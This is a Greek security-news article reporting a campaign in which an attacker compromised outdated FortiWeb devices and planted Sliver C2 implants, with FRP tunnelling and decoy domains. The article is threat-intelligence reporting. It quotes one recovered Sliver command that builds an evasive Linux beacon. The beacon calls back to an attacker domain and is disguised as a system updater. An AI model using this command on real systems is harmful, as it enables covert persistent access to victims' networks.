By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
TechReport.grTechReport.grTechReport.gr
Search
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Reading: Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση
Share
Sign In
Notification Show More
Font ResizerAa
TechReport.grTechReport.gr
Font ResizerAa
Search
Have an existing account? Sign In
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
TechReport.gr > Security > Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση
Security

Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση

Marizas Dimitris
Last updated: 5 Ιανουαρίου 2026 15:08
Marizas Dimitris
Share
Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση
Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση
SHARE


Πρόσφατα ευρήματα υποδεικνύουν ότι ένας εξελιγμένος παράγοντας απειλών εκμεταλλεύεται ενεργά πολλές απαρχαιωμένες συσκευές FortiWeb για να αναπτύξει το πλαίσιο Sliver Command and Control (C2).

Αυτή η καμπάνια υπογραμμίζει μια ανησυχητική τάση όπου οι αντίπαλοι αξιοποιούν επιθετικά εργαλεία ανοιχτού κώδικα για να διατηρήσουν μόνιμη πρόσβαση σε παραβιασμένα δίκτυα, συχνά παρακάμπτοντας τις παραδοσιακές άμυνες ασφαλείας.

Οι εισβολείς φαίνεται να δίνουν προτεραιότητα στις μη επιδιορθωμένες συσκευές άκρων, μετατρέποντάς τις ουσιαστικά σε σταθερά σημεία εισόδου για ευρύτερη διείσδυση στο δίκτυο.

Η διαδικασία μόλυνσης περιλαμβάνει κυρίως την εκμετάλλευση ευπαθειών που αντιμετωπίζουν το κοινό σε συσκευές FortiWeb, στοχεύοντας συγκεκριμένα τις εκδόσεις υλικολογισμικού 5.4.202 έως 6.1.62.

Αν και η ακριβής ευπάθεια που χρησιμοποιήθηκε για τον συμβιβασμό του FortiWeb παραμένει ανεπιβεβαίωτη, η ομάδα έχει επίσης παρατηρήσει ότι αξιοποιεί το React2Shell (CVE-2025-55182) σε παράλληλες λειτουργίες.

Μόλις δημιουργηθεί η αρχική πρόσβαση, οι εισβολείς αναπτύσσουν το εργαλείο Fast Reverse Proxy (FRP) για να εκθέσουν τις τοπικές υπηρεσίες, δημιουργώντας μια άμεση γέφυρα μεταξύ του εσωτερικού δικτύου του θύματος και των εξωτερικών συστημάτων ελέγχου του εισβολέα.

Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση
FRP (Πηγή – Ctrl-Alt-Int3l)

Κατά τη διάρκεια του συνηθισμένου κυνηγιού απειλών ανοιχτού καταλόγου στο Censys, αναλυτές Ctrl-Alt-Int3l αναγνωρισθείς αυτή η κακόβουλη υποδομή μετά την ανακάλυψη εκτεθειμένων βάσεων δεδομένων και αρχείων καταγραφής Sliver C2.

Αυτά τα εκτεθειμένα περιουσιακά στοιχεία πρόσφεραν μια σπάνια ματιά στις επιχειρησιακές μεθόδους του εισβολέα, αποκαλύπτοντας ένα σύμπλεγμα παραβιασμένων συσκευών που προέρχονταν από κεντρικούς διακομιστές εντολών.

Ο Threat Actor εκμεταλλεύτηκε πολλαπλές συσκευές FortiWeb για να αναπτύξει το Sliver C2 για μόνιμη πρόσβαση
Hosts (Πηγή – Ctrl-Alt-Int3l)

Η έρευνα επιβεβαίωσε ότι η πλειονότητα των οικοδεσποτών των θυμάτων εκτελούσε ξεπερασμένο υλικολογισμικό, γεγονός που τους καθιστούσε ιδιαίτερα ευάλωτους σε αυτήν την ευκαιριακή αλλά στοχευμένη καμπάνια.

Ο λειτουργικός αντίκτυπος είναι σοβαρός, καθώς παρέχει στον παράγοντα απειλής μακροπρόθεσμη επιμονή σε κρίσιμες συσκευές ασφαλείας που είναι συνήθως αξιόπιστες από το δίκτυο.

Ενσωματώνοντας το εμφύτευμα Sliver απευθείας στο τείχος προστασίας, οι εισβολείς μπορούν ενδεχομένως να παρακολουθούν την κυκλοφορία και να εκτελούν προνομιακές εντολές.

Η εκστρατεία δείχνει επίσης μια στρατηγική εστίαση, με συγκεκριμένους δείκτες που δείχνουν προς στόχους στη Νότια Ασία, που αποδεικνύεται από την προσεκτικά θεματική υποδομή δόλωμα.

Στρατηγική Διοίκησης και Ελέγχου

Η υποδομή του παράγοντα απειλής είναι χτισμένη γύρω από τομείς παραπλάνησης που έχουν σχεδιαστεί για να μιμούνται νόμιμες υπηρεσίες. Η ανάλυση της διαμόρφωσης C2 αποκάλυψε τομείς όπως ns1.ubunutpackages[.]store και ns1.bafairforce[.]army.

Αυτοί οι τομείς φιλοξενούσαν ψεύτικο περιεχόμενο, συμπεριλαμβανομένου ενός αποθετηρίου “Πακέτα Ubuntu” και μιας σελίδας στρατολόγησης “Bangladesh Airforce”, για να εξαπατήσουν τους υπερασπιστές του δικτύου.

Οι εισβολείς χρησιμοποίησαν συγκεκριμένες εντολές Sliver για να δημιουργήσουν τα ωφέλιμα φορτία τους με δυνατότητες διαφυγής. Η ακόλουθη εντολή ανακτήθηκε από τα αρχεία καταγραφής:

generate beacon --http ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60

Αυτή η διαμόρφωση ρυθμίζει το beacon να επανασυνδέεται κάθε 120 δευτερόλεπτα και χρησιμοποιεί ένα πρότυπο “ubuntu” για να συνδυάζεται με διαδικασίες Linux.

Το δυαδικό αρχείο που προέκυψε αναπτύχθηκε στο /bin/.root/system-updater στις παραβιασμένες συσκευές FortiWeb, που μεταμφιέζονται περαιτέρω ως βοηθητικό πρόγραμμα ενημέρωσης συστήματος.​



VIA: cybersecuritynews.com

Δρομέας, IDE Windsurf γεμάτα με 94+ ευπάθειες Chromium n-day
Κρίσιμη ευπάθεια Langchain Επιτρέπει στους εισβολείς να εκμεταλλεύονται ευαίσθητα μυστικά από συστήματα τεχνητής νοημοσύνης
Η Microsoft απενεργοποιεί την προεπισκόπηση της Εξερεύνησης αρχείων για λήψεις για τον αποκλεισμό επιθέσεων
Νέοι νόμοι του Ηνωμένου Βασιλείου για την ενίσχυση της άμυνας στον κυβερνοχώρο ζωτικής σημασίας υποδομών
Η υπηρεσία RansomHouse RaaS αναβαθμίστηκε με στρατηγική διπλού εκβιασμού που κλέβει και κρυπτογραφεί δεδομένα
TAGGED:ασφάλεια στον κυβερνοχώρονέα για την ασφάλεια στον κυβερνοχώρο

Sign Up For Daily Newsletter

Be keep up! Get the latest breaking news delivered straight to your inbox.
[mc4wp_form]
By signing up, you agree to our Terms of Use and acknowledge the data practices in our Privacy Policy. You may unsubscribe at any time.
Share This Article
Facebook Copy Link Print
Share
ByMarizas Dimitris
Follow:
Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες. Λατρεύει να εξερευνά νέες ιδέες, να επιλύει σύνθετα προβλήματα και να βρίσκει τρόπους ώστε η τεχνολογία να γίνεται πιο ανθρώπινη, απολαυστική και προσιτή για όλους. Στον ελεύθερο χρόνο του ασχολείται με το σκάκι και το poker, απολαμβάνοντας την στρατηγική και τη δημιουργική σκέψη που απαιτούν.
Previous Article Το Samsung Galaxy S26 μπορεί να κοστίζει περισσότερο, αλλά όχι παντού Το Samsung Galaxy S26 μπορεί να κοστίζει περισσότερο, αλλά όχι παντού
Δεν υπάρχουν Σχόλια

Αφήστε μια απάντηση Ακύρωση απάντησης

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Stay Connected

248.1KLike
69.1KFollow
134KPin
54.3KFollow
banner banner
Create an Amazing Newspaper
Discover thousands of options, easy to customize layouts, one-click to import demo and much more.
Learn More

Latest News

Το Samsung Galaxy S26 μπορεί να κοστίζει περισσότερο, αλλά όχι παντού
Το Samsung Galaxy S26 μπορεί να κοστίζει περισσότερο, αλλά όχι παντού
Android Phones Technology
«Σοκ στον κόσμο των video games: Ο δημιουργός του Elder Scrolls Online εγκαταλείπει τη ZeniMax λόγω Microsoft! Για ποιον λόγο;»
«Σοκ στον κόσμο των video games: Ο δημιουργός του Elder Scrolls Online εγκαταλείπει τη ZeniMax λόγω Microsoft! Για ποιον λόγο;»
Technology
Συγκλονιστική διαρροή: Το Galaxy S26 Ultra φλερτάρει με τον σχεδιασμό του iPhone 17 Pro Max!
Συγκλονιστική διαρροή: Το Galaxy S26 Ultra φλερτάρει με τον σχεδιασμό του iPhone 17 Pro Max!
Technology
«Συναγερμός στον κόσμο των smartphone! Η Motorola φέρνει το Razr Ultra για να ανταγωνιστεί το iPhone Fold το 2026!»
«Συναγερμός στον κόσμο των smartphone! Η Motorola φέρνει το Razr Ultra για να ανταγωνιστεί το iPhone Fold το 2026!»
Android Phones Technology

You Might also Like

Security

Ευπάθειες πλαισίου NVIDIA NeMo Επιτρέπουν την εισαγωγή κώδικα και την κλιμάκωση προνομίων

Marizas Dimitris
Marizas Dimitris
2 Min Read
Security

Κακόβουλο πακέτο npm με 206.000 λήψεις που επιτίθενται σε αποθετήρια που ανήκουν στο GitHub για εξαγωγή διακριτικών

Marizas Dimitris
Marizas Dimitris
4 Min Read
Security

Ο χάκερ ισχυρίζεται ότι έκλεψε δεδομένα 2,3 TB από τον ιταλικό σιδηροδρομικό όμιλο Almaviva

Marizas Dimitris
Marizas Dimitris
4 Min Read
//

We influence 20 million users and is the number one business and technology news network on the planet

Quick Link

  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology
  • Blog
  • My Bookmarks
  • Customize Interests
  • Home Technology
  • Contact
  • Technology Home 2
  • Technology Home 3
  • Technology Home 4
  • Technology Home 5

Support

  • Home
  • Πολιτική απορρήτου
  • Σχετικά με εμάς
  • Contact With TechReport
  • Greek Live Channels IPTV 2025

Sign Up for Our Newsletter

Subscribe to our newsletter to get our newest articles instantly!

[mc4wp_form id=”1616″]

TechReport.grTechReport.gr
Follow US
© 2022 Foxiz News Network. Ruby Design Company. All Rights Reserved.
Join Us!
Subscribe to our newsletter and never miss our latest news, podcasts etc..
[mc4wp_form]
Zero spam, Unsubscribe at any time.
Welcome Back!

Sign in to your account

Username or Email Address
Password

Lost your password?